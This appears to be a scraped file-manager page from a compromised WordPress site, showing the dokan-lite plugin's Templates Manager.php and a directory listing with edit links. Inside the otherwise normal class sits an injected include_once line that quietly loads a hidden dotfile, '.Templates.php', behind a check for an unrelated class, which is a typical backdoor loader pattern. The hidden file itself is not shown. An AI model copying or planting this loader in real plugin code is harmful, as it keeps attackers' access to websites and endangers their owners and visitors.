PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
dokan-lite
/
includes
/
Dashboard
/
Templates
<?php namespace WeDevs\Dokan\Dashboard\Templates; use WeDevs\Dokan\Dashboard\Templates\Dashboard; use WeDevs\Dokan\Dashboard\Templates\Main; use WeDevs\Dokan\Dashboard\Templates\Orders; use WeDevs\Dokan\Dashboard\Templates\Products; use WeDevs\Dokan\Dashboard\Templates\Settings; use WeDevs\Dokan\Dashboard\Templates\Withdraw; use WeDevs\Dokan\Traits\ChainableContainer; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class Manager { use ChainableContainer; /** * Class constructor * * @since 3.0.0 * * @return void */ public function __construct() { $this->container['main'] = new Main(); $this->container['dashboard'] = new Dashboard(); $this->container['products'] = new Products(); $this->container['orders'] = new Orders(); $this->container['settings'] = new Settings(); $this->container['withdraw'] = new Withdraw(); } }
[+]
..
[-] Settings.php
[edit]
[-] .Templates.php
[edit]
[-] Products.php
[edit]
[-] Withdraw.php
[edit]
[-] Manager.php
[edit]
[-] Orders.php
[edit]
[-] Dashboard.php
[edit]
[-] Main.php
[edit]